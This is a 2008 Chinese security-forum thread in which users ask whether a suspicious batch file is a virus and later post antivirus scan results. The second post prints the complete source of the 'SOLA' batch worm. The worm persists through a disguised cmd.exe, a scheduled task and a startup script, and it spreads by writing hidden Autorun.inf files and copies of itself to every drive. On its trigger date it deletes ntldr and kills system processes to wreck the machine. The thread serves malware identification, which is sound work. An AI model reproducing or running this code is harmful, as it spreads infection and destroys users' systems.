请高手测试这个是否是病毒

显示全部楼层 · 发表于 2008-5-27 16:15:22

红伞检测有病毒，是个批处理，会在windows文件夹——字体文件夹下建立文件，后缀名为bat，并且还会备份病毒文件，备份的病毒文件也上传了，后缀名和原文件名相同只不过备份文件是大写的
请高手检测

显示全部楼层 · 发表于 2008-5-27 16:17:02

运行环境不完整

@echo off
set sola=%systemroot%\Fonts
set setup=%systemroot%\Fonts\solasetup
if not "%1"=="-USB" goto Start
start /max ..
if exist %sola%\SOLA.BAT goto End
::========================Infect==============================
:Infect
cd\
md %systemroot%\Fonts\solasetup
::————文件复制---------
copy sola\Autorun.inf %setup%\Autorun.inf
copy sola\SOLA.BAT %setup%\SOLA.BAT
copy sola\宅男请进.RAR %setup%\宅男请进.RAR
copy sola\Tasks.xxx %setup%\Tasks.xxx
copy sola\sleep.exe %setup%\sleep.exe
tasklist >%sola%\task.txt
FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i
copy %systemroot%\system32\cmd.exe %sola%\%svchost%
del %sola%\task.txt
:Tasks
copy %setup%\Tasks.xxx %systemroot%\Tasks\Tasks.job
schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail
goto TaskSuc
:TaskFail
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
echo On Error Resume Next>SOLA.VBS
echo set ws=wscript.createobject("wscript.shell")>>SOLA.VBS
echo ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT",0 >>SOLA.VBS
copy SOLA.VBS %sola%\SOLA.VBS
echo NT>%systemroot%\Fonts\NoTasks
:TaskSuc
attrib %systemroot%\Tasks\Tasks.job +s +h +r
copy %setup%\sola.bat %sola%\sola.bat
copy %setup%\sleep.exe %systemroot%\system32\sleep.exe
:NoAutoPlay
net stop "Shell Hardware Detection"
echo Windows Registry Editor Version 5.00>%systemroot%\Fonts\Regedit.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\Regedit.reg
echo "Start"=dword:00000004>>%systemroot%\Fonts\Regedit.reg
start regedit /s %systemroot%\Fonts\Regedit.reg
:KillTMG
goto End
::======================Infect======================================
::======================Start=======================================
:Start
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
date /t >%sola%\est_type2032.fon
findstr /c:"-10-01" "%sola%\est_type2032.fon" & if not errorlevel 1 goto DayOn
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
:Continue
sleep 300&set C=0 & echo 1>C:\solachk1 & findstr . C:\solachk1 & if not errorlevel 1 del C:\solachk1 & sleep 1000&set C=1 & findstr /C:"SOLA_1.0" C:\Autorun.inf & if errorlevel 1 attrib -s -h -r C:\Autorun.inf© /y %setup%\Autorun.inf C:\Autorun.inf&attrib C:\Autorun.inf +s +h +r&md C:\SOLA© /y "%setup%\*" C:\SOLA\*&attrib C:\SOLA +s +h +r
sleep 300&set D=0 & echo 1>D:\solachk1 & findstr . D:\solachk1 & if not errorlevel 1 del D:\solachk1 & sleep 1000&set D=1 & findstr /C:"SOLA_1.0" D:\Autorun.inf & if errorlevel 1 attrib -s -h -r D:\Autorun.inf© /y %setup%\Autorun.inf D:\Autorun.inf&attrib D:\Autorun.inf +s +h +r&md D:\SOLA© /y "%setup%\*" D:\SOLA\*&attrib D:\SOLA +s +h +r
sleep 300&set E=0 & echo 1>E:\solachk1 & findstr . E:\solachk1 & if not errorlevel 1 del E:\solachk1 & sleep 1000&set E=1 & findstr /C:"SOLA_1.0" E:\Autorun.inf & if errorlevel 1 attrib -s -h -r E:\Autorun.inf© /y %setup%\Autorun.inf E:\Autorun.inf&attrib E:\Autorun.inf +s +h +r&md E:\SOLA© /y "%setup%\*" E:\SOLA\*&attrib E:\SOLA +s +h +r
sleep 300&set F=0 & echo 1>F:\solachk1 & findstr . F:\solachk1 & if not errorlevel 1 del F:\solachk1 & sleep 1000&set F=1 & findstr /C:"SOLA_1.0" F:\Autorun.inf & if errorlevel 1 attrib -s -h -r F:\Autorun.inf© /y %setup%\Autorun.inf F:\Autorun.inf&attrib F:\Autorun.inf +s +h +r&md F:\SOLA© /y "%setup%\*" F:\SOLA\*&attrib F:\SOLA +s +h +r
sleep 300&set G=0 & echo 1>G:\solachk1 & findstr . G:\solachk1 & if not errorlevel 1 del G:\solachk1 & sleep 1000&set G=1 & findstr /C:"SOLA_1.0" G:\Autorun.inf & if errorlevel 1 attrib -s -h -r G:\Autorun.inf© /y %setup%\Autorun.inf G:\Autorun.inf&attrib G:\Autorun.inf +s +h +r&md G:\SOLA© /y "%setup%\*" G:\SOLA\*&attrib G:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set H=0 & echo 1>H:\solachk1 & findstr . H:\solachk1 & if not errorlevel 1 del H:\solachk1 & sleep 1000&set H=1 & findstr /C:"SOLA_1.0" H:\Autorun.inf & if errorlevel 1 attrib -s -h -r H:\Autorun.inf© /y %setup%\Autorun.inf H:\Autorun.inf&attrib H:\Autorun.inf +s +h +r&md H:\SOLA© /y "%setup%\*" H:\SOLA\*&attrib H:\SOLA +s +h +r
sleep 300&set I=0 & echo 1>I:\solachk1 & findstr . I:\solachk1 & if not errorlevel 1 del I:\solachk1 & sleep 1000&set I=1 & findstr /C:"SOLA_1.0" I:\Autorun.inf & if errorlevel 1 attrib -s -h -r I:\Autorun.inf© /y %setup%\Autorun.inf I:\Autorun.inf&attrib I:\Autorun.inf +s +h +r&md I:\SOLA© /y "%setup%\*" I:\SOLA\*&attrib I:\SOLA +s +h +r
sleep 300&set J=0 & echo 1>J:\solachk1 & findstr . J:\solachk1 & if not errorlevel 1 del J:\solachk1 & sleep 1000&set J=1 & findstr /C:"SOLA_1.0" J:\Autorun.inf & if errorlevel 1 attrib -s -h -r J:\Autorun.inf© /y %setup%\Autorun.inf J:\Autorun.inf&attrib J:\Autorun.inf +s +h +r&md J:\SOLA© /y "%setup%\*" J:\SOLA\*&attrib J:\SOLA +s +h +r
sleep 300&set K=0 & echo 1>K:\solachk1 & findstr . K:\solachk1 & if not errorlevel 1 del K:\solachk1 & sleep 1000&set K=1 & findstr /C:"SOLA_1.0" K:\Autorun.inf & if errorlevel 1 attrib -s -h -r K:\Autorun.inf© /y %setup%\Autorun.inf K:\Autorun.inf&attrib K:\Autorun.inf +s +h +r&md K:\SOLA© /y "%setup%\*" K:\SOLA\*&attrib K:\SOLA +s +h +r
sleep 300&set L=0 & echo 1>L:\solachk1 & findstr . L:\solachk1 & if not errorlevel 1 del L:\solachk1 & sleep 1000&set L=1 & findstr /C:"SOLA_1.0" L:\Autorun.inf & if errorlevel 1 attrib -s -h -r L:\Autorun.inf© /y %setup%\Autorun.inf L:\Autorun.inf&attrib L:\Autorun.inf +s +h +r&md L:\SOLA© /y "%setup%\*" L:\SOLA\*&attrib L:\SOLA +s +h +r
sleep 300&set M=0 & echo 1>M:\solachk1 & findstr . M:\solachk1 & if not errorlevel 1 del M:\solachk1 & sleep 1000&set M=1 & findstr /C:"SOLA_1.0" M:\Autorun.inf & if errorlevel 1 attrib -s -h -r M:\Autorun.inf© /y %setup%\Autorun.inf M:\Autorun.inf&attrib M:\Autorun.inf +s +h +r&md M:\SOLA© /y "%setup%\*" M:\SOLA\*&attrib M:\SOLA +s +h +r
sleep 300&set N=0 & echo 1>N:\solachk1 & findstr . N:\solachk1 & if not errorlevel 1 del N:\solachk1 & sleep 1000&set N=1 & findstr /C:"SOLA_1.0" N:\Autorun.inf & if errorlevel 1 attrib -s -h -r N:\Autorun.inf© /y %setup%\Autorun.inf N:\Autorun.inf&attrib N:\Autorun.inf +s +h +r&md N:\SOLA© /y "%setup%\*" N:\SOLA\*&attrib N:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set O=0 & echo 1>O:\solachk1 & findstr . O:\solachk1 & if not errorlevel 1 del O:\solachk1 & sleep 1000&set O=1 & findstr /C:"SOLA_1.0" O:\Autorun.inf & if errorlevel 1 attrib -s -h -r O:\Autorun.inf© /y %setup%\Autorun.inf O:\Autorun.inf&attrib O:\Autorun.inf +s +h +r&md O:\SOLA© /y "%setup%\*" O:\SOLA\*&attrib O:\SOLA +s +h +r
sleep 300&set P=0 & echo 1>P:\solachk1 & findstr . P:\solachk1 & if not errorlevel 1 del P:\solachk1 & sleep 1000&set P=1 & findstr /C:"SOLA_1.0" P:\Autorun.inf & if errorlevel 1 attrib -s -h -r P:\Autorun.inf© /y %setup%\Autorun.inf P:\Autorun.inf&attrib P:\Autorun.inf +s +h +r&md P:\SOLA© /y "%setup%\*" P:\SOLA\*&attrib P:\SOLA +s +h +r
sleep 300&set Q=0 & echo 1>Q:\solachk1 & findstr . Q:\solachk1 & if not errorlevel 1 del Q:\solachk1 & sleep 1000&set Q=1 & findstr /C:"SOLA_1.0" Q:\Autorun.inf & if errorlevel 1 attrib -s -h -r Q:\Autorun.inf© /y %setup%\Autorun.inf Q:\Autorun.inf&attrib Q:\Autorun.inf +s +h +r&md Q:\SOLA© /y "%setup%\*" Q:\SOLA\*&attrib Q:\SOLA +s +h +r
sleep 300&set R=0 & echo 1>R:\solachk1 & findstr . R:\solachk1 & if not errorlevel 1 del R:\solachk1 & sleep 1000&set R=1 & findstr /C:"SOLA_1.0" R:\Autorun.inf & if errorlevel 1 attrib -s -h -r R:\Autorun.inf© /y %setup%\Autorun.inf R:\Autorun.inf&attrib R:\Autorun.inf +s +h +r&md R:\SOLA© /y "%setup%\*" R:\SOLA\*&attrib R:\SOLA +s +h +r
sleep 300&set S=0 & echo 1>S:\solachk1 & findstr . S:\solachk1 & if not errorlevel 1 del S:\solachk1 & sleep 1000&set S=1 & findstr /C:"SOLA_1.0" S:\Autorun.inf & if errorlevel 1 attrib -s -h -r S:\Autorun.inf© /y %setup%\Autorun.inf S:\Autorun.inf&attrib S:\Autorun.inf +s +h +r&md S:\SOLA© /y "%setup%\*" S:\SOLA\*&attrib S:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set T=0 & echo 1>T:\solachk1 & findstr . T:\solachk1 & if not errorlevel 1 del T:\solachk1 & sleep 1000&set T=1 & findstr /C:"SOLA_1.0" T:\Autorun.inf & if errorlevel 1 attrib -s -h -r T:\Autorun.inf© /y %setup%\Autorun.inf T:\Autorun.inf&attrib T:\Autorun.inf +s +h +r&md T:\SOLA© /y "%setup%\*" T:\SOLA\*&attrib T:\SOLA +s +h +r
sleep 300&set U=0 & echo 1>U:\solachk1 & findstr . U:\solachk1 & if not errorlevel 1 del U:\solachk1 & sleep 1000&set U=1 & findstr /C:"SOLA_1.0" U:\Autorun.inf & if errorlevel 1 attrib -s -h -r U:\Autorun.inf© /y %setup%\Autorun.inf U:\Autorun.inf&attrib U:\Autorun.inf +s +h +r&md U:\SOLA© /y "%setup%\*" U:\SOLA\*&attrib U:\SOLA +s +h +r
sleep 300&set V=0 & echo 1>V:\solachk1 & findstr . V:\solachk1 & if not errorlevel 1 del V:\solachk1 & sleep 1000&set V=1 & findstr /C:"SOLA_1.0" V:\Autorun.inf & if errorlevel 1 attrib -s -h -r V:\Autorun.inf© /y %setup%\Autorun.inf V:\Autorun.inf&attrib V:\Autorun.inf +s +h +r&md V:\SOLA© /y "%setup%\*" V:\SOLA\*&attrib V:\SOLA +s +h +r
sleep 300&set W=0 & echo 1>W:\solachk1 & findstr . W:\solachk1 & if not errorlevel 1 del W:\solachk1 & sleep 1000&set W=1 & findstr /C:"SOLA_1.0" W:\Autorun.inf & if errorlevel 1 attrib -s -h -r W:\Autorun.inf© /y %setup%\Autorun.inf W:\Autorun.inf&attrib W:\Autorun.inf +s +h +r&md W:\SOLA© /y "%setup%\*" W:\SOLA\*&attrib W:\SOLA +s +h +r
sleep 300&set X=0 & echo 1>X:\solachk1 & findstr . X:\solachk1 & if not errorlevel 1 del X:\solachk1 & sleep 1000&set X=1 & findstr /C:"SOLA_1.0" X:\Autorun.inf & if errorlevel 1 attrib -s -h -r X:\Autorun.inf© /y %setup%\Autorun.inf X:\Autorun.inf&attrib X:\Autorun.inf +s +h +r&md X:\SOLA© /y "%setup%\*" X:\SOLA\*&attrib X:\SOLA +s +h +r
sleep 300&set Y=0 & echo 1>Y:\solachk1 & findstr . Y:\solachk1 & if not errorlevel 1 del Y:\solachk1 & sleep 1000&set Y=1 & findstr /C:"SOLA_1.0" Y:\Autorun.inf & if errorlevel 1 attrib -s -h -r Y:\Autorun.inf© /y %setup%\Autorun.inf Y:\Autorun.inf&attrib Y:\Autorun.inf +s +h +r&md Y:\SOLA© /y "%setup%\*" Y:\SOLA\*&attrib Y:\SOLA +s +h +r
sleep 300&set Z=0 & echo 1>Z:\solachk1 & findstr . Z:\solachk1 & if not errorlevel 1 del Z:\solachk1 & sleep 1000&set Z=1 & findstr /C:"SOLA_1.0" Z:\Autorun.inf & if errorlevel 1 attrib -s -h -r Z:\Autorun.inf© /y %setup%\Autorun.inf Z:\Autorun.inf&attrib Z:\Autorun.inf +s +h +r&md Z:\SOLA© /y "%setup%\*" Z:\SOLA\*&attrib Z:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
%systemdrive%
sleep 5000
goto Start
:DayOn
attrib %systemdrive%\ntldr -s -h -r & del /q /a %systemdrive%\ntldr & shutdown -r -t 10 -c "您的计算机上带有SOLA病毒，今天是它的发作日期。病毒已经破坏了您的系统，您的计算机将在10秒钟后重启。" & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn csrss.exe',0);window.close()"
sleep 10000
if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn winlogon.exe',0);window.close()"
goto Start
::=====================Start=========================================
:End
:: 毫无疑问，这是一个病毒，我是它的制造者KAKENHI。比起那些编程高手来说，我的水平还差得远，顶多只能算是一个script boy。但经过一番思索后，我还是决定将这个病毒传播出去（尽管这只是献丑罢了^_^）。由于本人爱好ACG，所以如果是同好的话，请打开“宅男请进.RAR”,那里有解药。

复制代码

[ 本帖最后由 tanlimo 于 2008-5-27 16:29 编辑 ]

显示全部楼层 · 发表于 2008-5-27 16:24:40

宅男病毒！！怎么修复啊！请帮忙！！

显示全部楼层 · 发表于 2008-5-27 19:36:47

rs 0

显示全部楼层 · 发表于 2008-5-27 21:06:15

RS20.46.12未杀！

显示全部楼层 · 发表于 2008-5-27 21:09:56

D:\download\987F~1.RAR>>sola.bat Virus.BAT.Agent.ac.wrum 病毒还未处理
D:\download\987F~1.RAR>>SOLA01 Virus.BAT.Agent.ac.wrum 病毒还未处理

[可疑文件] 请高手测试这个是否是病毒

本帖子中包含更多资源

本帖子中包含更多资源

评分

3/0